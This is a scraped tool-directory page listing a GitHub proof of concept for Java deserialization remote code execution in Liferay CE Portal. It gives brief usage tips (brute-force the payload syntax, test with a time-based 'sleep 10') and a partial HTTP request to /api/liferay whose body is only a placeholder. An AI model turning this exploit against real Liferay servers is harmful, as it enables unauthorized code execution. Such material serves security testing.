Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Liferay-CE-Portal-Java-Deserialization — This repo contains PoC for the remote code execution vulnerability of Liferay CE Portal! | Kitploit
Tools/GitHubGitHub/0x45dd/liferay-ce-portal-java-deserialization
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHub0x45dd/liferay-ce-portal-java-deserialization

Liferay-CE-Portal-Java-Deserialization

This repo contains PoC for the remote code execution vulnerability of Liferay CE Portal!

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
View Repository
216 years agoNot yet reviewed

Liferay-CE-Portal-Java-Deserialization

This repo contains PoC for the remote code execution vulnerability of Liferay CE Portal!

Payloads

I already shared payloads in repo. You must find the right syntax by brute-force method.Payloads I share are for time-based proof of concept (sleep 10). The application may not always output the command. That's why you should try time-based payload while doing PoC.

Proof Of Concept

  • POST /api/liferay HTTP/1.1
  • Host: TARGET
  • User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0)
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9
  • Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
  • Accept-Encoding: gzip, deflate
  • Connection: close

ROME-PAYLOAD-FILE

Example PoC (sleep 10)

Download Tool